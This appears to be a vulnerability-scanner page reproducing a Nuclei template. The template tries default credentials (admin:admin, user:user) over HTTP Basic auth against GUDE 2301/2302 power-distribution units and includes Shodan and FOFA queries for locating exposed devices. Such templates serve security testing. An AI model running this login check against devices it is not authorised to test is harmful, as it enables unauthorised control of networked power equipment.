gude-default-login: GUDE - Default Login

2026-02-03 GUDE PoC Public

Description

GUDE 2301 and 2302 default administrator or user login credentials (admin:admin or user:user) were detected.

PoC

id: gude-default-login

info:
  name: GUDE - Default Login
  author: Bretss,BENZOOgatag
  severity: high
  description: GUDE 2301 and 2302 default administrator or user login credentials (admin:admin or user:user) were detected.
  reference:
    - https://media.distrelec.com/Web/Downloads/_m/an/Gude_2302-1_ger_man.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 2
    shodan-query: http.html:"Expert Net Control"
    fofa-query: body="Expert Net Control"
  tags: gude,default-login

http:
  - raw:
      - |
        GET /ov.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: clusterbomb
    payloads:
      username:
        - admin
        - user
      password:
        - admin
        - user

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Control Panel"
          - "Output Port"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022020ea808ebd10ce6ba1dc8c5a089fc3392c8ee0233289659b4eaec93fdaf425d4022100ef043d4e414517f832603c987c61b0cca069733c9f9af9062119b6f4124cca90:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities